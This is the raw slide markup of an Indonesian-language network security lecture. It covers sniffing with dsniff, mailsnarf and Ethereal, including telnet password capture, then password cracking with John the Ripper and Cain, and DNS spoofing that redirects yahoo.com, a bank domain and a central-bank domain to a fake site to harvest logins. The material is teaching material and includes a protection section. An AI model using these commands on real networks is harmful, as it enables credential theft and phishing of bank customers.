              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dsniff: listening on eth0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-----------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>04/26/02 23:31:45 tcp workstation.1076 -&gt; target.21 (ftp)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>USER anonymous</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="hlink"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PASS guest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>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Outline </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6147" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>Target  acquisition and information gathering </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>(Mencari Informasi)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>Initial access</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Eksplotasi WEB server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>DoS Attack</a:t>
            </a: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Penyadap lainnya</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32771" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Menyadap akses ke web dengan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>urlsnarf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Menyadap email (SMTP) dengan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mailsnarf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mailsnarf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mailsnarf &gt;&gt; mailbox.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mutt –f mailbox.txt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Ethereal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33795" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Program penyadap (penangkap) paket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Tersedia untuk sistem UNIX &amp; Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>GUI-based untuk memudahkan pengguna</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Dilengkapi dengan beberapa fasilitas (tools), seperti untuk mengikuti flow paket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Ethereal screenshots</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34819" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="800100" y="1600200"/>
            <a:ext cx="2857500" cy="1428750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34820" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1333500" y="3124200"/>
            <a:ext cx="2857500" cy="1428750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34821" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3048000" y="4572000"/>
            <a:ext cx="2847975" cy="1428750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34822" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5486400" y="3200400"/>
            <a:ext cx="2857500" cy="1428750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34823" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4724400" y="1600200"/>
            <a:ext cx="2876550" cy="1447800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34824" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1333500" y="4876800"/>
            <a:ext cx="952500" cy="95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Menangkap data dengan ethereal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35843" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Jalankan ethereal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Pilih menu “Capture”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Pada komputer lain jalankan sesi telnet, masukkan userid dan password, exit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Hentikan tangkapan pada ethereal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Pilih paket yang pada kolom protokol tertera “TELNET”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Pilih menu “Tools -&gt; Follow TCP stream”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Akan keluar window baru dan nampak sesi telnet tersebut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933450" y="685800"/>
            <a:ext cx="7219950" cy="5495925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36867" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3184525" y="4148138"/>
            <a:ext cx="4486275" cy="831850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="hlink"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hasil tangkapan ethereal.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Perhatikan userid dan password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36868" name="Oval 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="914400"/>
            <a:ext cx="2819400" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="hlink"/>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Password Cracking</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37891" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Mencoba memecahkan password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Menggunakan dictionary (kombinasi kata yang ada di kamus)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Brute force (dicoba karakter per karakter)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>John the ripper: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>john passw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>d.1</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" smtClean="0">
              <a:latin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Membuka password di windows</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38915" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="904875" y="1981200"/>
            <a:ext cx="3514725" cy="3143250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38916" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4572000" y="2133600"/>
            <a:ext cx="3648075"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Cain – membuka akses Windows</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39939" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="3581400"/>
            <a:ext cx="5276850" cy="3048000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39940" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="1600200"/>
            <a:ext cx="5267325"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Membajak DNS</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40963" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Untuk mengarahkan orang ke situs palsu (dan kemudian dicatat userid &amp; passwordnya)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Unix# cat dnsspoofhost</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>192.168.1.1	*.yahoo.com</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>192.168.1.1	*.klikbca.com</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>192.168.1.1	*.bi.go.id</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>unix# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>dnsspoof –f dnsspoofhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49"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Proteksi</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41987" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Menggunakan enkripsi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>telnet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
